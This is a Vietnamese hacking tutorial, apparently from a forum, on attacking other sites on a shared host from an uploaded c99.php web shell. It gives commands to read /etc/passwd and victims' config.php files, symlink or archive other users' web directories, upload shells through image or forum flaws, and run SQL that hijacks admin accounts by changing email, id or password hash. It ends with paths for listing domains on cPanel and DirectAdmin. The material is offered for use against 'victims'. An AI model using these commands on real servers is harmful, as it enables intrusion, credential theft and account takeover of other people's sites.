PHP Code:
cat /etc/passwd : liệt kê các user có trên server
PHP Code:
dir /home/user/public_html/ : đi đến public_html của user
PHP Code:
ln -s /home/user/public_html/index.php hehe.txt : ghi file index.php vào file hehe.txt trên thư mục mình đang dùng : ví dụ đang dùng http://abc.com/c99.php thì vào http://abc.com/hehe.txt
PHP Code:
ln -s /home/user_của_mình/public_html/c99.php /home/user_của_victim/public_html/c99.php lựa chọn thư mục chmod 777 hay 755 mà có quyền ghi nhé =>Thì dir qua web nó rồi run command típ
_Nếu wa web nó ko run đc thì sao ?
=>thì xem web nó có forum hay cái gì đó ko mình úp shell thông qua lỗi ảnh hoặc úp wa forum
-vậy phải làm sao để xem đc file config để vào được database ?
PHP Code:
cat /home/user/public_html/forum/includes/config.php >> xem file config.php => thì download website nó về mà ngâm cứu config
PHP Code:
tar -czf hehehe.tar.gz /home/user/public_html/forum/ ko thì download cái config nó thôi.
PHP Code:
tar -czf config.tar.gz /home/user/public_html/forum/includes/config.php thì xem cách mã hóa
hiện tại có 2 cái dezend và base64_decode ,xem google thì bít
nếu zip ko đc chắc bó tay quá >> đỗi cách khác (nói lăng nhăng quá mình bỏ wa bước này )
Vậy nếu có user+pass+data mà đăng nhập ko được ,đăng nhập đc mà ko zip đc thì làm sào sữa đc mà vào admin úp shell trên forum ??
=>Con shell mình đang dùng ko phải là root nên rất hạn chế
1 vài lệnh cải thiện :
PHP Code:
chmod a+wxr file.php -rwxrwxrwx chmod a+drw file.php -rwxrwxrwx chmod -R a+rx thumuc >> giao quyen doc va vao ben trong thu muc,ke ca thu muc con chmod -R a+rwx thumuc >> quyen root
mkdir backup >> tạo thư mục backup
chmod 777 backup >> chmod nó thành 777 để mình zip data.zip lên
_Nếu ko chmod 777 được thì làm sao ?
=> tạo con chmod.php nội dung như sau:
Quote:
PHP Code:
<?php chmod("backup", 0777); ?>http://abc.com/chmod.php
sau đó úp con dumper.php lên rồi điền info vào zip ,zip xong có thể về localhost chỉnh sữa rồi úp lên => backup thế là mình đã quản lí
-Cách này lằng nhằng quá ,data nó cả trăm M thì phiền ?
vậy thì dùng con c99.php ,vào chổ nào có user mà chỉnh sữa
ví dụ nó có bảng user bao gồm id và email ,....thì run command trên SQL của data là
PHP Code:
update user set email="hehehe@yahoo.com" where id=1 >> sau đó chơi quên mật khẩu gửi user+pass về email hehehe@yahoo.com
hoặc
Quote:
PHP Code:
update user set id ='6'where user='hehehe' hoặc
Quote:
PHP Code:
update user set passwd ="e10adc3949ba59abbe56e057f20f883e" where id=1 1) Xem list domain & user trên cùng sever
Code:
directadmin: cat /etc/virtual/domainowners cpanel: ls -la /etc/valiases/tendomainvictim.com cd/etc/vdomainaliases;ls-lia
er nằm cùng host thì ta thêm && vào
Code:
cd/etc/vdomainaliases && ls-lia
Code:
cat /etc/passwd less /etc/passwd more /etc/passwd head /etc/passwd tac /etc/passwd rev /etc/passwd xxd /etc/passwd
Code:
dir /home/ten user can local/public_html vd: dir /home/vhb/public_html
-> có thể sài các lệnh đó thay thế cho cat, less,...
Code:
cat/home/ten user can local/public_html/index.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: tác dụng gần giống như tạo shorcut trên windows.
Code:
ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.
6) Tìm path của mấy victim sài Add on domain
find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'
